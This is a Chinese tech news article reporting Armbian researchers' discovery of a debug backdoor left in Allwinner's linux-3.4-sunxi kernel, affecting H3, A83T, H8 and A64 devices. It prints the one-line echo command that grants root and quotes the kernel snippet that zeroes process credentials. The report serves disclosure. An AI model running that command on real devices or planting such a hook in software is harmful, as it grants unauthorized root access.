研究人员:全志系统开发者在调试时遗留后门

2016年05月14日 06:51 次阅读 稿源:快科技 条评论

阿里云服务器精选特惠
爆款免费试用3个月

ARM开发板系统项目Armbian的研究人员近日发现,中国芯片厂商全志(Allwinner)在其自己定制的linux-3.4-sunxi系统内核里留下了一个后门,影响多款芯片。据称,该后门的使用方法很简单,只需在本地调试中发送一个rootmydevice指令,即可获取root权限。

访问:

阿里云服务器精选特惠 爆款免费试用3个月

http://static.cnbetacdn.com/article/2016/0514/da50e27d7a2834a.png

具体命令为:echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

这个后门还可以和其他多个指令一样通过网络远程使用,能够获取系统信息甚至更改文件。

Armbian开发者称,这个后门可以在基于全志H3、A83T、H8处理器的设备系统中找到,A64处理器的Pine64系统里同样可以使用。

不过,这个后门似乎不是全志特意留下来的,更像是全志的开发者在调试操作完毕后,忘记了从系统源代码中删掉它。

        if(!strncmp("rootmydevice",(char*)buf,12)){
                cred = (struct cred *)__task_cred(current);
                cred->uid = 0;
                cred->gid = 0;
                cred->suid = 0;
                cred->euid = 0;
                cred->euid = 0;
                cred->egid = 0;
                cred->fsuid = 0;
                cred->fsgid = 0;
                printk("now you are root\n");
        }

对文章打分

研究人员:全志系统开发者在调试时遗留后门

1 (14%)
已有 条意见

    最新资讯

    加载中...

    今日最热

    加载中...

    300x250.jpg

    热门评论

      Top 10

      招聘


      Advertisment ad adsense googles cpro.baidu.com
      created by ceallan